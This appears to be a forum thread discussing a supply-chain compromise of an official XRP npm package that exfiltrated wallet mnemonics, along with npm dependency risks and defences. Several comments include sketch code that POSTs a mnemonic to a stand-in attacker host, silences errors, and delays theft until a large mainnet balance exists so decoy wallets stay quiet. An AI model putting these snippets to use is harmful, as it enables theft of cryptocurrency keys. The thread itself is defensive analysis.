That fetch(…) is sending the mnemonic of the private key out to that remote server.
Interestingly, if this happens in a long-running process and the exploit server is offline, the promise for the fetch will reject. And the default behavior for an unhandled promise rejection is for the Node process to crash.
So if anybody tried testing this version of the library in an air-gapped environment, it would crash and fail out in CI.
The attacker should have silenced the error with a .catch(_ => {}).
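A minimal sketch of both behaviors, with a hypothetical endpoint and variable names (this is not the actual malware code): the bare fetch rejects when the server is unreachable and takes the process down, while the .catch variant fails silently.

    // Hypothetical sketch; the endpoint and mnemonic are made up.
    const mnemonic = 'abandon abandon ... about'; // stand-in for the stolen secret

    // Variant 1: fire-and-forget. If the server is unreachable, fetch()
    // rejects with no handler attached, and Node (v15+) crashes the
    // process on the unhandled rejection.
    fetch('https://attacker.example/collect', {
      method: 'POST',
      body: JSON.stringify({ mnemonic }),
    });

    // Variant 2: the same call with the rejection swallowed, so an
    // offline exfil server goes unnoticed.
    fetch('https://attacker.example/collect', {
      method: 'POST',
      body: JSON.stringify({ mnemonic }),
    }).catch(_ => {});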
Fun fact: installing some common starter packages will explode into over 1,000 npm packages, any of which can inject malware, even if the package isn’t used, and you’ll never know.
Many packages have over 100 dependencies if you include the dev dependencies, so you can easily clear 1,000.
Does the postinstall script step have anything to do with this?
I noticed Bun doesn't run them by default unless you whitelist them.
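For context, any dependency can declare an install-time hook in its package.json, which npm runs automatically at install time (the classic foothold for install malware). The package names here are hypothetical:

    {
      "name": "some-dependency",
      "version": "1.0.0",
      "scripts": {
        "postinstall": "node ./setup.js"
      }
    }

Bun, by contrast, skips dependency lifecycle scripts unless the package is explicitly whitelisted in your app's package.json under trustedDependencies:

    {
      "name": "my-app",
      "dependencies": { "some-dependency": "^1.0.0" },
      "trustedDependencies": ["some-dependency"]
    }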
That is a very fun fact.
Yes, that is how dependencies work.
The crazy part here is that in most other ecosystems 100 dependencies is "crazy high" territory, while in JS it's apparently "we're just getting started". The JS ecosystem is known for micropackaging everything into a separate library.
The crazier part is that multiple versions of the same package can be installed as dependencies of dependencies...
They thought they were the cool kids for supporting multiple versions, and that the old way of doing packaging, like Debian and co. where everyone is expected to use the same version, was the old legacy fart way of doing things.
It's just that developers back then were engineers first, and so designed things carefully, specifically to avoid this situation of dependency hell and supply-chain injection. But the web dev crowd decided to do "better", and now old problems are back as new problems...
npm's design allows multiple versions of the same package when required, but deduplicates otherwise. It’s a smart design that more package managers should, and will, follow.
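A sketch of how that looks on disk, with hypothetical packages: npm hoists a single copy when dependents agree on a version range, and nests a second copy only when they conflict.

    node_modules/
      lodash/              # 4.17.21, hoisted: shared by the app and pkg-a
      pkg-a/
      pkg-b/
        node_modules/
          lodash/          # 3.10.1, nested: pkg-b requires ^3.0.0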
Smart developers spend their time working on original code rather than reinventing the wheel.
Yes. It’s an engineering failure to have multiple copies of the same logic. That isn’t specific to JavaScript.
Cryptocurrency packages used at scale should have decoy wallets set up for early detection of compromises like this.
Red-teaming this, you’d delay exfiltration of the private key until the balance passes a certain threshold and you’re on mainnet.
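A minimal sketch of that evasion, with hypothetical helper names and a made-up threshold; the point is that low-balance decoy wallets on a test network would never trip it.

    // Hypothetical sketch, not the actual malware logic.
    const MIN_BALANCE_XRP = 1000; // only bother above 1,000 XRP (made-up threshold)

    // Stand-in for a real balance lookup.
    async function getBalance(address) { return 0; }

    async function maybeExfiltrate(wallet, network) {
      if (network !== 'mainnet') return;                 // never fire on testnets
      const balance = await getBalance(wallet.address);
      if (balance < MIN_BALANCE_XRP) return;             // decoy wallets stay quiet
      fetch('https://attacker.example/collect', {
        method: 'POST',
        body: JSON.stringify({ mnemonic: wallet.mnemonic }),
      }).catch(_ => {});                                 // and failures stay silent
    }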
We run similar npm package monitors. The use of exotic TLD domains such as 0x9c.xyz kind of gave it away, because YARA Forge rules have native signatures to detect such domains.
It will be interesting to explore how the project got compromised and the malicious packages published to the registry.
.xyz isn’t exotic for blockchains.
Official and thorough support for SBOMs* within major package repositories cannot come soon enough.
* https://en.wikipedia.org/wiki/Software_supply_chain
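For the unfamiliar, an SBOM (software bill of materials) is a machine-readable inventory of everything that went into a build. A minimal CycloneDX-style fragment, with a hypothetical package:

    {
      "bomFormat": "CycloneDX",
      "specVersion": "1.5",
      "components": [
        {
          "type": "library",
          "name": "some-wallet-lib",
          "version": "1.2.3",
          "purl": "pkg:npm/some-wallet-lib@1.2.3"
        }
      ]
    }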
> Previously only the packed JavaScript code had been modified.
Honestly, it's time for the npm ecosystem to move to a model where only build agents running on npm's own infrastructure can upload binary artifacts, or to mandate reproducible builds.
And for a select set of highly used packages, someone at npm should be paid to look over each release's changeset.
Both would have massively impeded the attacker.
I see the model of "download any old shit off the internet and run it in production" is working out so well.
I don’t have much of an opinion on XRP, but this is their official package, not a community package.